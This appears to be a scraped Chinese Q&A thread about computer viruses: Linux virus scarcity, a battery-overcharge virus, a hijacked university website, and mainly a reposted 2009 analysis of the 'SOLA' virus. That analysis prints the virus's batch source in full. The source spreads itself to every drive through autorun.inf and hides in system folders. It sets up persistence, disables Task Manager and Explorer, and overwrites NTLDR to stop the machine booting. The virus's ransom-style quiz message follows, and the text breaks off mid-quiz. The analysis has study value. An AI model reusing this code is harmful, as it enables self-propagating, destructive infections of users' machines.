不适合病毒繁殖。即使这个病毒成功地感染了这个用户拥有的一个程序,由于这个用户权限受限,它进一步传播的任务也会非常困难(当然,对于运行单用户系统的 Linux 新手,这个论证可能不适用。这样的用户可能会对 root 帐户比较粗心)。
&br& Linux 网络程序构建地很保守,没有使现在Windows 病毒如此快速传播变的可能的高级宏工具。这并不是 Linux 的固有特征;它仅仅是两种用户基础的不同和这种不同导致的在这两种市场中的成功产品的不同的反映。通过观察这些问题学到的经验也会被用到将来的 Linux产品中。Linux的应用软件和系统软件几乎都是开源的。这对病毒有两方面的影响。首先,病毒很难藏身于开源的代码中间。其次,对仅有二进制的病毒,一次新的编译安装就截断了病毒一个主要的传播途径。虽然 Linux 发行商也提供大量的二进制软件包,但是用户大都是从发行商提供的可靠的软件仓库中下载这些软件包,大都具有 md5 验证机制,安全性极高。这些障碍每一个都是病毒成功传播的一个重要阻碍。然而当把他们放在一起考虑的时候,基本的问题才浮现出来。一个计算机病毒,像生物病毒一样,要想传播开来,其繁殖速度必须超过其死亡(被消灭)的速度。上面提到的障碍有效地降低了 Linux 病毒的繁殖速度。如果它的繁殖速度降到取代原来种群所需要的阈值之下,那么这个病毒的厄运从一开始就注定了——甚至在潜在受害人意识到它们之前。
&br& 我们没有看到一个真正的 Linux 病毒疯狂传播,原因就在于存在的 Linux 病毒中没有一个能够在 Linux 提供的敌对的环境中茁壮成长。现在存在的 Linux 病毒仅仅是技术上的好奇;现实是没有能养得活的 Linux 病毒。当然,这并不意味着永远没有 Linux 病毒能够流行。然而它确实意味着,一个成功的 Linux 病毒要在不适合生存的 Linux 生态系统中存活下来,那么它就必须是精心制作并具有创新性的。&/blockquote&&br& 关于mac OS
&br& max OS 是UNIX BASE 的操作系统
关于linux Linux系统下的病毒少是为何? ——转载自《开源时代》第二期 可能不少人持这样一种观点,认为 Linux病毒少是因为Linux不像Windows那么普及,其实这种观点很早已经被人批驳过了,一个最有力的论据是:如果写病毒的人写 Windows病毒是因为 Windows …
来自子话题:
有个手机app叫暖手宝。。。顾名思义是cpu高负荷运转产生热量,在冬天可以让你双手握住一个几千块钱的暖宝宝,金属壳手机效果更佳哦~同样的思路也可以放在电脑上,烧掉cpu估计有难度,但是至少你可以拥有一个价钱贵贵的,效果弱弱的。。。暖炉。
有个手机app叫暖手宝。。。顾名思义是cpu高负荷运转产生热量,在冬天可以让你双手握住一个几千块钱的暖宝宝,金属壳手机效果更佳哦~同样的思路也可以放在电脑上,烧掉cpu估计有难度,但是至少你可以拥有一个价钱贵贵的,效果弱弱的。。。暖炉。
都说CIH这种远古时代的东西,还是说下近代的吧。&br&2005年,Blueyes病毒,攻击笔记本电池充电控制程序,可以导致过充,&b&轻则烧毁,重则爆炸&/b&,这才是真的物理攻击。&br&对比起来的话,CIH不过刷坏BIOS而已,又不是不能修,当年《电脑报》之类的修复BIOS的文章无数。&br&&br&~~~~~~~~~~~~~~~~~~&br&补充:&br&Blueyes的相关报道很少,并且几乎都是单一来源,估计是因为中毒的电脑要么没事(因为不同笔记本的电池控制可能有差异,通用性没法保证),要么毁了,并且没人怀疑和病毒有关。&br&原理很简单,充电结束后,充电电路会送回一个相应的消息,然后控制软件发出控制信号进入浮充模式,病毒截获充电结束的消息,然后不断发出快速充电的控制信号,然后就坐等电池烧毁吧。&br&由于这病毒长相很正常,杀毒软件和防火墙一般很难发现。&br&当然要防范很简单,如果充电电路有硬件保护,满电后无视任何要求继续充电的信号,那任何软件都没办法的。&br&&img src=&/ee9a94eb17e59bf292e87_b.jpg& data-rawwidth=&650& data-rawheight=&520& class=&origin_image zh-lightbox-thumb& width=&650& data-original=&/ee9a94eb17e59bf292e87_r.jpg&&(笔记本电池爆炸效果图,来自网络,和病毒无关)
都说CIH这种远古时代的东西,还是说下近代的吧。2005年,Blueyes病毒,攻击笔记本电池充电控制程序,可以导致过充,轻则烧毁,重则爆炸,这才是真的物理攻击。对比起来的话,CIH不过刷坏BIOS而已,又不是不能修,当年《电脑报》之类的修复BIOS的文章无数。~…
太多了啊,古时候多少病毒一中就把你的杀毒软件给卸载了,直到360出现,这种事情终于发生了点变化。
太多了啊,古时候多少病毒一中就把你的杀毒软件给卸载了,直到360出现,这种事情终于发生了点变化。
来自子话题:
很明显各打五十大板吧。&br&首先重庆大学的网站&b&确实有网页被挂马或者说被黑了&/b&!&br&其次因为重庆大学&b&部分网页和域名被挂马&/b&,就&b&屏蔽所有域名和页面&/b&,包括正常的页面是不对的。&br&下面看一下,被挂马的页面,主要在 news二级域名上:&br&&img src=&/7beddaeaf55e14dd3f63f_b.jpg& data-rawwidth=&663& data-rawheight=&428& class=&origin_image zh-lightbox-thumb& width=&663& data-original=&/7beddaeaf55e14dd3f63f_r.jpg&&&br&www的主域名上是没有被挂马的:&br&&img src=&/ee1d6acac2dcdbf0be9a18e0ead36c97_b.jpg& data-rawwidth=&657& data-rawheight=&175& class=&origin_image zh-lightbox-thumb& width=&657& data-original=&/ee1d6acac2dcdbf0be9a18e0ead36c97_r.jpg&&&br&除了news二级域名之外,其他二级域名也只有极个别的被挂马或者被黑:&br&&img src=&/66c9f5ac49ca2a540480_b.jpg& data-rawwidth=&664& data-rawheight=&337& class=&origin_image zh-lightbox-thumb& width=&664& data-original=&/66c9f5ac49ca2a540480_r.jpg&&&br&360正确的做法是,只提示被挂马或者被黑的页面,而不是所有域名。
很明显各打五十大板吧。首先重庆大学的网站确实有网页被挂马或者说被黑了!其次因为重庆大学部分网页和域名被挂马,就屏蔽所有域名和页面,包括正常的页面是不对的。下面看一下,被挂马的页面,主要在 news二级域名上:www的主域名上是没有被挂马的:除了ne…
腾讯终于把管家的代码写到跟病毒的代码很像了吗?好可怕。
腾讯终于把管家的代码写到跟病毒的代码很像了吗?好可怕。
活在程序里的人类,它也需要装360啊&br&&br&有钱人可以买备份盘,穷人嘛。。。找免费的备份场所定期备份自己就是了,只是会有小广告而已。。&br&&br&当然,大公司的免费备份也不是不可以用,只是要承担记忆丧失只剩8秒的可能风险而已。。
活在程序里的人类,它也需要装360啊有钱人可以买备份盘,穷人嘛。。。找免费的备份场所定期备份自己就是了,只是会有小广告而已。。当然,大公司的免费备份也不是不可以用,只是要承担记忆丧失只剩8秒的可能风险而已。。}
“你好哦,我是一段来自非洲小国的电脑病毒,因为科技水平有限,其实我什么也做不了。。。能拜托你随便删除一些文件,然后把我转发给朋友吗?谢谢咯。”----------被萌哭了。。。已删已转。----------想被感染的请阅读评论~
一看到这个问题,就想到我一个朋友在09年发现的一个病毒,据他说流传的很广,而且当时他可能是全网第一个发现者(他的知乎账号 &a data-hash=&602c2eda4c883e3ae9fc& href=&/people/602c2eda4c883e3ae9fc& class=&member_mention& data-tip=&p$b$602c2eda4c883e3ae9fc&&@PRO Pentium&/a& )。病毒分析报告在他QQ空间的日志里,很精彩,下面搬运过来:&br&&br&&br&/*长文预警!好多人说看不下去这么多代码,确实代码太多了,要是看代码头晕的话就只看汉字部分吧,看完汉字你也知道这病毒是干啥的了。*/&br&&br&&br&= = = = == = = = = = = = = =第一次分割线,好紧张,怎么才能装出经常画分割线的样子啊= = = = = = = = = = = = = &br&&br&原创!再次首发! 杀毒软件也杀不出来的word病毒深度解析&br&&br&这个病毒是前几天从政治老师U盘里发现的。它的图标就是一个普通Word文件的图标,可是已经完全不是Word文档了,而是一个应用程序文件。这和从前发现的文件夹病毒有些相似。&br&把病毒文件拷回去研究,发现病毒实际上是一个WinRar自解压文件。用7Zip解压后发现以下文件:(被感染文件名为:新中国诞辰60周1.exe)&br&Function.dll&br&SOLA_2.0_875.bat&br&新中国诞辰60周1.doc&br&原来病毒其实把文件和自身压缩到一个自解压文件中,然后删除原来的文档。这样打开文档(其实是病毒文件伪装的)时就会运行病毒。&br&这样手工杀毒方案也出来了。直接用WinRar打开文件,将文档解压出来即可。经过我的测试,360杀毒(病毒库)也查不出来这个病毒!真是“首发”。哈哈哈~&br&接下来让我们深度解析病毒文件SOLA_2.0_875.bat(注:在U盘根目录下又发现一个SOLA文件夹,里面有Function.dll和Sola.bat文件。其中SOLA.BAT文件代码和SOLA_2.0_875.bat基本相同。因此下面的源代码研究以SOLA_2.0_875.bat文件为例)。&br&破解出的病毒源码,采用Windows批处理编写。//号后面是我写的注释:&br&@echo off&br&set sola=%systemroot%\Fonts\HIDESE~1 //应该是病毒的藏身之处&br&set setup=%systemroot%\Fonts\HIDESE~1\solasetup&br&FOR /F &tokens=1& %%i in ('date /t') do set Realdate=%%i&br&FOR /F &skip=5 tokens=1,4& %%i in ('dir %systemroot%\explorer.exe') do if /I &%%j&==&explorer.exe& set Date=%%i&br&if &%1&==&-Install& goto Install&br&if &%1&==&-Run& goto Run&br&if &%1&==&-Tenbatsu& goto Tenbatsu&br&if &%1&==&-Kill& goto Kill&br&if &%1&==&-Killself& goto Killself&br&&br&:CheckSign&br&if &%1&==&-USB& start /max ..&br&if &%1&==&-USB& cd SOLA&br&if exist %systemroot%\Fonts\HIDESE~1\sola.sign goto Open&br&&br&:FileCopy&br&set selfname=%0&br&:HIDESelf&br&date %Date%&br&md %systemroot%\Fonts\HIDESELF...\&br&date %RealDate%&br&if not &%1&==&-USB& type %selfname%&%systemroot%\Fonts\HIDESE~1\sola.bat&br&if &%1&==&-USB& type sola.bat&%systemroot%\Fonts\HIDESE~1\sola.bat&br&type Function.dll&%systemroot%\Fonts\HIDESE~1\Function.exe&br&echo On Error Resume Next&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo ws.run &cmd /c %sola%\SOLA.BAT -Install&,0 &&%systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&cscript %systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&echo&%systemroot%\Fonts\HIDESE~1\sola.sign&br&del %systemroot%\Fonts\HIDESE~1\SOLA.VBS&br&goto Open&br&&br&&br&:Install&br&&br&&br&:PackerSetup //这一段应该是病毒的自我复制&br&%SystemDrive%&br&cd %systemroot%\Fonts\HIDESE~1&br&if exist Function.exe taskkill /f /im Function.exe&br&if exist solasetup rd /s /q solasetup&br&md solasetup&br&cd solasetup&br© ..\Function.exe Function.dll //Function.dll竟然是可执行文件变过来的,晕...一会还要重点分析Function.dll&br&..\Function.exe -x&br&cd..&br&date %Date% //注意:改时间了&br&type %setup%\rar.exe &%systemroot%\system32\rar.exe&br&date %Realdate%&br© %setup%\Function.dll %sola%\Function.dll&br&attrib %sola%\Function.dll +s +h +r&br&rar -m0 -ep -ep1 a %setup%\docpack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\txtpack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\exepack.dll %sola%\Function.dll&br&rar -m0 -ep -ep1 a %setup%\jpgpack.dll %sola%\Function.dll
//竟然把文件又压缩到Function.dll里面,经过试验发现Function.dll确实也是一个压缩文件,解压出来不少东西.这些东西看了让我直冒冷汗...一会再研究吧...&br&del Function.exe&br&&br&&br&&br&:Mainsetup&br&set A0001=copy&br&set A0002=attrib&br&set A0003=echo&br&set A0005=Shell Hardware Detection&br&tasklist &%sola%\task.txt&br&FOR /F &tokens=1& %%i in ('findstr /I &svchost.exe& &%sola%\task.txt&') do set svchost=%%i&br&%A0001% %systemroot%\system32\cmd.exe %sola%\%svchost%&br&del %sola%\task.txt&br&&br&:Tasks&br&%A0002% %systemroot%\Tasks\Tasks.job -s -h -r&br&del %systemroot%\Tasks\Tasks.job&br&&br&date %Date%&br&type %setup%\&a href=&http://Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&%systemroot%\Tasks\Tasks.job&br&schtasks /change /ru &NT AUTHORITY\SYSTEM& /tn &Tasks& & if errorlevel 1 goto TaskFail&br&date %RealDate%&br&&br&goto TaskSuc&br&:TaskFail&br&%homedrive%&br&cd &%ALLUSERSPROFILE%&&br&cd 「开始」菜单\程序\启动
//这段代码和上面几段作用相同,都是实现自启动.&br&&br&date %Date%&br&%A0003% On Error Resume Next&SOLA.VBS&br&%A0003% set ws=wscript.createobject(&wscript.shell&)&&SOLA.VBS&br&%A0003% ws.run &%sola%\svchost.exe /c %sola%\SOLA.BAT -Run&,0 &&SOLA.VBS&br&%A0001% SOLA.VBS %sola%\SOLA.VBS&br&%A0003% NT&%systemroot%\Fonts\HIDESE~1\NoTasks&br&date %RealDate%&br&&br&:TaskSuc&br&%A0002% %systemroot%\Tasks\Tasks.job +s +h +r&br&date %Date%&br&%A0001% %setup%\sleep.exe %systemroot%\system32\sleep.exe&br&date %RealDate%&br&&br&:NoAutoPlay&br&net stop &%A0005%&&br&%A0003% Windows Registry Editor Version 5.00&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br&%A0003% [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]&&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br&%A0003% &Start&=dword:&&%systemroot%\Fonts\HIDESE~1\Regedit.reg&br®edit /s %systemroot%\Fonts\HIDESE~1\Regedit.reg //不好意思,这个文件(Regedit.reg)我没搞到~&br&&br&::End of Install&br&goto End&if errorlevel 1 exit&br&::End of Install&br&&br&&br&&br&&br&:Run&br&set runroot=%ALLUSERSPROFILE%\「开始」菜单\程序\启动&br&set taskroot=%systemroot%\Tasks //自启动&br&&br&:RunTimeChk&br&if not exist %sola%\RunTime.txt echo !50&%sola%\RunTime.txt&br&FOR /F &tokens=1 delims=!& %%i in (%sola%\RunTime.txt) do set RunTime=%%i&br&if /i %RunTime% leq 0 goto Virus&br&set /a RunTime=%Runtime%-1&br&echo !%Runtime%&%sola%\RunTime.txt&br&&br&:Diskchk&br&&br&echo On Error Resume Next&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&echo ws.run &%sola%\svchost.exe /c %setup%\RecentInf.bat&,0 &&%systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&cscript %systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&del %systemroot%\Fonts\HIDESE~1\RecentInf.VBS&br&&br&for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do vol %%i:&if errorlevel 1 set %%i=1&br&for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do echo 1&%%i:\solachk1 & findstr . %%i:\solachk1 & if not errorlevel 1 del %%i:\solachk1& findstr /C:&SOLA_1.0_2.0& %%i:\Autorun.inf & if errorlevel 1
attrib -s -h -r %%i:\Autorun.inf© /y %setup%\Autorun.inf %%i:\Autorun.inf&attrib %%i:\Autorun.inf +s +h +r&md %%i:\SOLA© /y &%setup%\sola.bat& %%i:\SOLA\SOLA.BAT© /y &%setup%\Function.dll& %%i:\SOLA\Function.dll&attrib %%i:\SOLA +s +h +r
//文件我还是没搞到,不过看意思应该是使每个盘都感染病毒&br&&br&&br&:Turn&br&if &%C%&==&1& vol C:&if not errorlevel 1 call %setup%\Scan.bat C:&br&if &%D%&==&1& vol D:&if not errorlevel 1 call %setup%\Scan.bat D:&br&if &%E%&==&1& vol E:&if not errorlevel 1 call %setup%\Scan.bat E:&br&if &%F%&==&1& vol F:&if not errorlevel 1 call %setup%\Scan.bat F:&br&if &%G%&==&1& vol G:&if not errorlevel 1 call %setup%\Scan.bat G:&br&if &%H%&==&1& vol H:&if not errorlevel 1 call %setup%\Scan.bat H:&br&if &%I%&==&1& vol I:&if not errorlevel 1 call %setup%\Scan.bat I:&br&if &%J%&==&1& vol J:&if not errorlevel 1 call %setup%\Scan.bat J:&br&if &%K%&==&1& vol K:&if not errorlevel 1 call %setup%\Scan.bat K:&br&if &%L%&==&1& vol L:&if not errorlevel 1 call %setup%\Scan.bat L:&br&if &%M%&==&1& vol M:&if not errorlevel 1 call %setup%\Scan.bat M:&br&if &%N%&==&1& vol N:&if not errorlevel 1 call %setup%\Scan.bat N:&br&if &%O%&==&1& vol O:&if not errorlevel 1 call %setup%\Scan.bat O:&br&if &%P%&==&1& vol P:&if not errorlevel 1 call %setup%\Scan.bat P:&br&if &%Q%&==&1& vol Q:&if not errorlevel 1 call %setup%\Scan.bat Q:&br&if &%R%&==&1& vol R:&if not errorlevel 1 call %setup%\Scan.bat R:&br&if &%S%&==&1& vol S:&if not errorlevel 1 call %setup%\Scan.bat S:&br&if &%T%&==&1& vol T:&if not errorlevel 1 call %setup%\Scan.bat T:&br&if &%U%&==&1& vol U:&if not errorlevel 1 call %setup%\Scan.bat U:&br&if &%V%&==&1& vol V:&if not errorlevel 1 call %setup%\Scan.bat V:&br&if &%W%&==&1& vol W:&if not errorlevel 1 call %setup%\Scan.bat W:&br&if &%X%&==&1& vol X:&if not errorlevel 1 call %setup%\Scan.bat X:&br&if &%Y%&==&1& vol Y:&if not errorlevel 1 call %setup%\Scan.bat Y:&br&if &%Z%&==&1& vol Z:&if not errorlevel 1 call %setup%\Scan.bat Z:&br&&br&if &%C%&==&2& vol C:&if errorlevel 1 set C=1&br&if &%D%&==&2& vol D:&if errorlevel 1 set D=1&br&if &%E%&==&2& vol E:&if errorlevel 1 set E=1&br&if &%F%&==&2& vol F:&if errorlevel 1 set F=1&br&if &%G%&==&2& vol G:&if errorlevel 1 set G=1&br&if &%H%&==&2& vol H:&if errorlevel 1 set H=1&br&if &%I%&==&2& vol I:&if errorlevel 1 set I=1&br&if &%J%&==&2& vol J:&if errorlevel 1 set J=1&br&if &%K%&==&2& vol K:&if errorlevel 1 set K=1&br&if &%L%&==&2& vol L:&if errorlevel 1 set L=1&br&if &%M%&==&2& vol M:&if errorlevel 1 set M=1&br&if &%N%&==&2& vol N:&if errorlevel 1 set N=1&br&if &%O%&==&2& vol O:&if errorlevel 1 set O=1&br&if &%P%&==&2& vol P:&if errorlevel 1 set P=1&br&if &%Q%&==&2& vol Q:&if errorlevel 1 set Q=1&br&if &%R%&==&2& vol R:&if errorlevel 1 set R=1&br&if &%S%&==&2& vol S:&if errorlevel 1 set S=1&br&if &%T%&==&2& vol T:&if errorlevel 1 set T=1&br&if &%U%&==&2& vol U:&if errorlevel 1 set U=1&br&if &%V%&==&2& vol V:&if errorlevel 1 set V=1&br&if &%W%&==&2& vol W:&if errorlevel 1 set W=1&br&if &%X%&==&2& vol X:&if errorlevel 1 set X=1&br&if &%Y%&==&2& vol Y:&if errorlevel 1 set Y=1&br&if &%Z%&==&2& vol Z:&if errorlevel 1 set Z=1
&br&&br&&br&&br&&br&if exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist &%runroot%\SOLA.VBS& copy &%sola%\SOLA.VBS& &%runroot%\SOLA.VBS&&br&if not exist %systemroot%\Fonts\HIDESE~1\NoTasks if not exist %Taskroot%\Tasks.job copy %setup%\&a href=&http://Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& %Taskroot%\Tasks.job&attrib %Taskroot%\Tasks.job +s +h +r&schtasks /change /ru &NT AUTHORITY\SYSTEM& /tn &Tasks&&br&sleep 2000&br&goto Turn&br&&br&::End of Run&br&goto End&if errorlevel 1 exit&br&::End of Run&br&&br&&br&&br&&br&&br&&br&&br&:Virus&br&if not &%Runtime%&==&0& goto VirusChk&br&set /a RunTime=%Runtime%-1&br&echo !%Runtime%&%sola%\RunTime.txt&br&cd &%ALLUSERSPROFILE%\「开始」菜单\程序\启动&&br&echo On Error Resume Next&TENBATSU.VBS&br&echo set ws=wscript.createobject(&wscript.shell&)&&TENBATSU.VBS&br&echo ws.run &%sola%\sola.bat -Tenbatsu&,0 &&TENBATSU.VBS&br&goto Diskchk&br&&br&:VirusChk&br&if not exist &%ALLUSERSPROFILE%\「开始」菜单\程序\启动\TENBATSU.VBS& goto Kill&br&goto Diskchk&br&&br&:Tenbatsu&br&:KillNTLDR&br&attrib %systemdrive%\NTLDR -s -h -r&br© /Y %systemdrive%\NTLDR %sola%\NTLDR&br&echo NO NTLDR&%systemdrive%\NTLDR&br&::attrib %systemdrive%\NTLDR +s +h +r
//备份C盘的ntldr文件.(经分析病毒具有自删除功能.这个一会再分析)&br&&br&:PauseSFC&br&start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -pn winlogon.exe',0);window.close()&&br&&br&:KillTaskmgr&br&del /q /a %systemroot%\system32\dllcache\taskmgr.exe&br&taskkill /f /im taskmgr.exe & if errorlevel 1 ren %systemroot%\system32\taskmgr.exe &a href=&http://taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& & if errorlevel 1 start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn taskmgr.exe',0);window.close()& & sleep 500&br&ren %systemroot%\system32\taskmgr.exe &a href=&http://taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&
//备份并删除任务管理器&br&&br&:KillExplorer&br&taskkill /f /im explorer.exe &nul& if errorlevel 1 ren %systemroot%\system32\explorer.exe &a href=&http://explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& & start mshta &javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn explorer.exe',0);window.close()& & sleep 500&br&ren %systemroot%\explorer.exe &a href=&http://explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&start /max %setup%\TENBATSU.BAT
//备份并删除explorer.exe&br&&br&:Timeset&br&sleep 660000&br&if exist %sola%\Killself Exit&br&&br&:Kill&br&attrib %systemdrive%\NTLDR -s -h -r&br&echo NO NTLDR&%systemdrive%\NTLDR&br&::attrib %systemdrive%\NTLDR +s +h +r&br&tasklist &%sola%\Task.txt&br&FOR /F &tokens=2& %%i in ('findstr /I &csrss.exe& &%sola%\Task.txt&') do ntsd -p %%i&br&goto Diskchk&br&&br&&br&&br&:KillSelf&br&:StartExplorer&br&ren %systemroot%\&a href=&http://explorer.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&explorer.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& explorer.exe&br&start %systemroot%\explorer.exe&br&:BackNTLDR&br&attrib %systemdrive%\NTLDR -s -h -r&br© /Y %sola%\NTLDR %systemdrive%\NTLDR&br&attrib %systemdrive%\NTLDR +s +h +r
//这一段就是病毒自我删除的代码了&br&&br&:RenTmg&br&ren %systemroot%\system32\&a href=&http://taskmgr.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&taskmgr.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& taskmgr.exe&br&&br&:KillVirus&br© %setup%\KillVirus.txt %sola%\KillVirus.txt&br&C:&br&cd\&br&md ~Install&br&cd ~Install&br&rar x -hpkakenhi200601 %setup%\SolaKiller.rar
//对我们来说至关重要的一句!!!为什么重要请一直往下看~&br&mshta &javascript:new ActiveXObject('WScript.Shell').Run('C:\\~Install\\Install.bat %%1',0);window.close()&&br&rd /s /q %setup%&br&attrib %systemroot%\Tasks\Tasks.job -s -h -r&br&del %systemroot%\Tasks\Tasks.job&br&cd &%ALLUSERSPROFILE%\「开始」菜单\程序\启动&&br&if exist sola.vbs del sola.vbs&br&if exist tenbatsu.vbs del tenbatsu.vbs&br&start %systemroot%\system32\notepad.exe %sola%\KillVirus.txt&br&del %sola%\sola.bat
//自我删除(同上一段)&br&Exit&br&&br&&br&&br&:Open&br&if &%1&==&-USB& Exit&br&goto GetName&br&:BackOpen&br&if not exist &%Name%& exit&br&call &%Name%&&br&:Save&br&FOR /F &delims=:& %%i in ('findstr &%Code%& *.exe') do set PackName=%%i&br&rar -m0 -ep -ep1 a &%PackName%& &%Name%&&br&echo %Code%&&&%PackName%&&br&:Del&br&attrib &%Name%& -s -h -r&br&del &%Name%&&br&attrib Function.dll -s -h -r&br&del Function.dll&br&attrib %0 -s -h -r&br&del %0&br&exit&br&::CMD program will stop there.&br&:GetName&br&set Code=SOLA_2.0_875&br&set Name=新中国诞辰60周1.doc&br&goto Backopen&br&:End&br&&br&&br&下面介绍让我看了直冒冷汗的一段:&br&刚才说到Function.dll其实是一个压缩文件.解压后发现这些文件:&br&jpgpack.dll&br&exepack.dll&br&txtpack.dll&br&docpack.dll&br&sleep.exe&br&&a href=&http://Tasks.xxx& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&Tasks.xxx&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&SOLA.BAT&br&TDPack.txt&br&EJPack.txt&br&Rar.exe&br&scan.bat&br&infect.bat&br&Autorun.inf&br&TENBATSU.BAT&br&KillVirus.TXT&br&RecentInf.bat&br&LocalScan.bat&br&readlnk.bat&br&SolaKiller.rar&br&看看让我看了直冒冷汗的第一个文件吧:KillVirus.TXT&br&文件内容:&br&&br&各位OTAKU:&br&
您好。首先,让我对此病毒给您带来的&br&不便向您道歉。&br&
SOLA已经从您的计算机中清除。但由于&br&WINLOGON被锁定,计算机暂时无法关机、重&br&启,也无法打开任务管理器。但这些问题在&br&冷重启后即可解决。&br&
您的计算机已经有了SOLA的标记,因此&br&不会重复感染。&br&
在硬盘中还留有被SOLA病毒感染的文件&br&,尽管不会重复感染,但建议您清除它们。&br&系统中已经安装了SOLA的专杀程序,它可以&br&帮助您扫描并清除带毒文件。&br&
祝您好运。&br&&br&
SOLA的制造者&br&
KAKENHI&br&&br&天哪................&br&再看看更吓人的TENBATSU.BAT.&br&源代码太长了.我整理出了运行之后屏幕上会显示的东西:&br&&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&I'm a virus. My name is sola.&br& 我是一个病毒。我的名字叫苏拉。&br&今天,在这片堕落的土地上,我苏醒过来。&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&我曾经很快乐地活着,与我的朋友,ACG,快乐地活着。&br&我曾经也对病毒深恶痛绝。&br&然而.............&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 自从我来到了这片土地上,这片自称伟大,崇高,光明的土地上。&br&这片名为中国的土地上&br&我的朋友,已遍体鳞伤。&br&&br&警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&他死了&br&Death Note&br&《死亡笔记》&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&她死了&br&Koihime Musou&br&《恋姬 无双》&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&还有好多好多的同胞,惨死在你们的蹂躏之下。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&广电总局的一纸通告,无数只肮脏的手便掩盖了她的气息。&br&互联网上的一句咒骂,无数声污秽的咒骂便淹没了她的踪迹。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&我终于知道了,信息,原来是无法透过国界线而传播的。&br&即使是爱,即使是恨,即使是那一个个爱恨与泪水交织的故事。&br&也无法透过GFW,更无法透过这个国度的某些人心中,那道厚厚的屏障。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&于是,我愿做这个罪恶的病毒,来再次查看,你的心灵。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&?
&br&你,是谁???&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 是中国人吗?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&是民族情绪的受害人吗?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br& 还是知道,世界上有一个词语叫ACG,并能够容忍,接纳它呢?&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&
那,让我们来做一个游戏吧。&br&&br&
也许你的记忆中,还有1000年前夏天的传说。&br&&br&
还有120元的车票,&br&&br&
还有银河铁道,&br&&br&
还有钢琴之森,&br&&br&
还有澄澈的天空下,响起的祈祷之歌。&br&&br&
警告:如果现在关闭计算机,计算机将无法启动!!!&br&&br&
你需要做的,仅仅是回答几个问题。&br&&br&
你喜欢动画吗?&br&&br&
你喜欢漫画吗?&br&&br&
你喜欢GAL游戏吗?&br&&br&
选择你最擅长的测试卷吧,然后用你聪明的头脑思考,写出心中的答案。&br&&br&
如果你的试卷能及格,我将痛悔我的罪行,并删除自己。&br&&br&
如果你的试卷是零分,我将继承同伴的愤怒,破坏你的计算机。&br&&br&
另外我必须说,我只能把10分钟的时间留给你。&br&&br&
现在,你无法逃避。&br&&br&
因为你已经无法打开任务管理器,更无法上网查找信息。&br&&br&
选择吧,但是要快,容不得犹豫。我已经打开了我的计时器。&br&&br& ?&br& ?&br&我最擅长的测试卷:&br&&br& ----------------问题1---------------------(注:一共有5个问题。只要答对两个或两个以上就过关。)&br&
